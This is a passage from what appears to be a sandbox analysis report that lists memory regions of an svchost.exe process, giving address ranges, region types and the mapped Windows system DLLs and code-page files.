= "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1858 start_va = 0xdd0000 end_va = 0xdd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 1859 start_va = 0xde0000 end_va = 0xde1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 1860 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 1861 start_va = 0xf00000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 1862 start_va = 0x1000000 end_va = 0x1336fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1863 start_va = 0x1340000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 1864 start_va = 0x1440000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1865 start_va = 0x1540000 end_va = 0x15bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 1866 start_va = 0x15c0000 end_va = 0x15c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015c0000" filename = "" Region: id = 1867 start_va = 0x15d0000 end_va = 0x15e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 1868 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1869 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 1870 start_va = 0x1800000 end_va = 0x18dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1871 start_va = 0x18e0000 end_va = 0x18f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1872 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1873 start_va = 0x1a00000 end_va = 0x1a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1874 start_va = 0x1a80000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 1875 start_va = 0x1b80000 end_va = 0x1c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 1876 start_va = 0x1c80000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 1877 start_va = 0x1d00000 end_va = 0x1d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 1878 start_va = 0x1d80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1879 start_va = 0x1e80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1880 start_va = 0x1f80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1881 start_va = 0x2080000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1882 start_va = 0x2180000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1883 start_va = 0x2280000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1884 start_va = 0x2380000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1885 start_va = 0x2480000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1886 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1887 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1888 start_va = 0x2700000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1889 start_va = 0x2780000 end_va = 0x2790fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 1890 start_va = 0x27a0000 end_va = 0x27b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 1891 start_va = 0x27c0000 end_va = 0x27d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 1892 start_va = 0x27e0000 end_va = 0x27e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 1893 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1894 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1895 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1896 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1897 start_va = 0x2c00000 end_va = 0x2c8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1898 start_va = 0x2c90000 end_va = 0x2ca0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 1899 start_va = 0x2cb0000 end_va = 0x2cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 1900 start_va = 0x2cd0000 end_va = 0x2cf7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 1901 start_va = 0x2d10000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 1902 start_va = 0x2e10000 end_va = 0x2f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 1903 start_va = 0x2f10000 end_va = 0x300ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 1904 start_va = 0x3010000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 1905 start_va = 0x3110000 end_va = 0x3140fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 1906 start_va = 0x3150000 end_va = 0x3160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 1907 start_va = 0x3170000 end_va = 0x3180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 1908 start_va = 0x3190000 end_va = 0x328ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 1909 start_va = 0x3290000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 1910 start_va = 0x3310000 end_va = 0x3340fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 1911 start_va = 0x3350000 end_va = 0x3380fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 1912 start_va = 0x3390000 end_va = 0x3396fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 1913 start_va = 0x33a0000 end_va = 0x33a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 1914 start_va = 0x33b0000 end_va = 0x33b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000033b0000" filename = "" Region: id = 1915 start_va = 0x33c0000 end_va = 0x343ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 1916 start_va = 0x3570000 end_va = 0x35effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 1917 start_va = 0x35f0000 end_va = 0x366ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 1918 start_va = 0x3670000 end_va = 0x376ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 1919 start_va = 0x3770000 end_va = 0x386ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1920 start_va = 0x3870000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1921 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1922 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1923 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 1924 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 1925 start_va = 0x3e00000 end_va = 0x3e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 1926 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 1927 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1928 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 1929 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1930 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 1931 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1932 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1933 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1934 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1935 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 1936 start_va = 0x4900000 end_va = 0x4906fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 1937 start_va = 0x4970000 end_va = 0x4976fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 1938 start_va = 0x4b00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 1939 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 1940 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 1941 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 1942 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 1943 start_va = 0x5500000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 1944 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1945 start_va = 0x5800000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 1946 start_va = 0x5900000 end_va = 0x59fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 1947 start_va = 0x5a00000 end_va = 0x5afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 1948 start_va = 0x5b00000 end_va = 0x5bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 1949 start_va = 0x5c00000 end_va = 0x5cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 1950 start_va = 0x5d00000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 1951 start_va = 0x5e00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 1952 start_va = 0x5f00000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 1953 start_va = 0x6000000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 1954 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 1955 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 1956 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 1957 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 1958 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1959 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 1960 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 1961 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 1962 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 1963 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 1964 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 1965 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 1966 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 1967 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 1968 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 1969 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 1970 start_va = 0x7400000 end_va = 0x74fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007400000" filename = "" Region: id = 1971 start_va = 0x7500000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 1972 start_va = 0x7800000 end_va = 0x78fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007800000" filename = "" Region: id = 1973 start_va = 0x7a00000 end_va = 0x7afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 1974 start_va = 0x7b00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b00000" filename = "" Region: id = 1975 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 1976 start_va = 0x7d00000 end_va = 0x7dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 1977 start_va = 0x7e00000 end_va = 0x7efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e00000" filename = "" Region: id = 1978 start_va = 0x7f00000 end_va = 0x7ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 1979 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1980 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1981 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1982 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1983 start_va = 0x7ff681250000 end_va = 0x7ff68125cfff monitored = 0 entry_point = 0x7ff681253980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1984 start_va = 0x7ff9fb670000 end_va = 0x7ff9fb686fff monitored = 0 entry_point = 0x7ff9fb677520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1985 start_va = 0x7ff9fb690000 end_va = 0x7ff9fb764fff monitored = 0 entry_point = 0x7ff9fb6acf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1986 start_va = 0x7ff9fbc10000 end_va = 0x7ff9fbc53fff monitored = 0 entry_point = 0x7ff9fbc383e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1987 start_va = 0x7ff9fbc60000 end_va = 0x7ff9fbc81fff monitored = 0 entry_point = 0x7ff9fbc72540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1988 start_va = 0x7ff9fbc90000 end_va = 0x7ff9fbca7fff monitored = 0 entry_point = 0x7ff9fbc9b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1989 start_va = 0x7ff9fbcb0000 end_va = 0x7ff9fbd0cfff monitored = 0 entry_point = 0x7ff9fbcde510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1990 start_va = 0x7ff9fc050000 end_va = 0x7ff9fc057fff monitored = 0 entry_point = 0x7ff9fc0513b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1991 start_va = 0x7ff9fdd20000 end_va = 0x7ff9fdfcffff monitored = 0 entry_point = 0x7ff9fdd21cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1992 start_va = 0x7ff9fdfd0000 end_va = 0x7ff9fe04ffff monitored = 0 entry_point = 0x7ff9fdffd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1993 start_va = 0x7ff9fe100000 end_va = 0x7ff9fe135fff monitored = 0 entry_point = 0x7ff9fe1027f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 1994 start_va = 0x7ff9ff040000 end_va = 0x7ff9ff071fff monitored = 0 entry_point = 0x7ff9ff04b0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1995 start_va = 0x7ff9ff380000 end_va = 0x7ff9ff397fff monitored = 0 entry_point = 0x7ff9ff381b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 1996 start_va = 0x7ff9ff9c0000 end_va = 0x7ff9ff9fefff monitored = 0 entry_point = 0x7ff9ff9e82d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1997 start_va = 0x7ff9ffa00000 end_va = 0x7ff9ffa66fff monitored = 0 entry_point = 0x7ff9ffa0b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1998 start_va = 0x7ff9ffa70000 end_va = 0x7ff9ffa83fff monitored = 0 entry_point = 0x7ff9ffa72a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1999 start_va = 0x7ff9ffaa0000 end_va = 0x7ff9ffab1fff monitored = 0 entry_point = 0x7ff9ffaa1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 2000 start_va = 0x7ff9ffbb0000 end_va = 0x7ff9ffcbefff monitored = 0 entry_point = 0x7ff9ffbec010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 2001 start_va = 0x7ffa00360000 end_va = 0x7ffa0047cfff monitored = 0 entry_point = 0x7ffa0038fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 2002 start_va = 0x7ffa012a0000 end_va = 0x7ffa012b0fff monitored = 0 entry_point = 0x7ffa012a28d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 2003 start_va = 0x7ffa01690000 end_va = 0x7ffa016a3fff monitored = 0 entry_point = 0x7ffa01693710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 2004 start_va = 0x7ffa01740000 end_va = 0x7ffa0175dfff monitored = 0 entry_point = 0x7ffa0174ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 2005 start_va = 0x7ffa069a0000 end_va = 0x7ffa069b5fff monitored = 0 entry_point = 0x7ffa069a1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 2006 start_va = 0x7ffa07a20000 end_va = 0x7ffa07a30fff monitored = 0 entry_point = 0x7ffa07a27480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 2007 start_va = 0x7ffa07a40000 end_va = 0x7ffa07ac3fff monitored = 0 entry_point = 0x7ffa07a58d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 2008 start_va = 0x7ffa07ad0000 end_va = 0x7ffa07ae5fff monitored = 0 entry_point = 0x7ffa07ad55e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2009 start_va = 0x7ffa07af0000 end_va = 0x7ffa07bc5fff monitored = 0 entry_point = 0x7ffa07b1a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 2010 start_va = 0x7ffa07c20000 end_va = 0x7ffa07c83fff monitored = 0 entry_point = 0x7ffa07c3bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 2011 start_va = 0x7ffa07c90000 end_va = 0x7ffa07cb4fff monitored = 0 entry_point = 0x7ffa07c99900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2012 start_va = 0x7ffa07cc0000 end_va = 0x7ffa07cd3fff monitored = 0 entry_point = 0x7ffa07cc1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2013 start_va = 0x7ffa07ce0000 end_va = 0x7ffa07dd5fff monitored = 0 entry_point = 0x7ffa07d19590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2014 start_va = 0x7ffa07de0000 end_va = 0x7ffa07e53fff monitored = 0 entry_point = 0x7ffa07df5eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2015 start_va = 0x7ffa07e60000 end_va = 0x7ffa07f96fff monitored = 0 entry_point = 0x7ffa07ea0480 region_type = mapped_file name = "wbemcore.dll" filename = 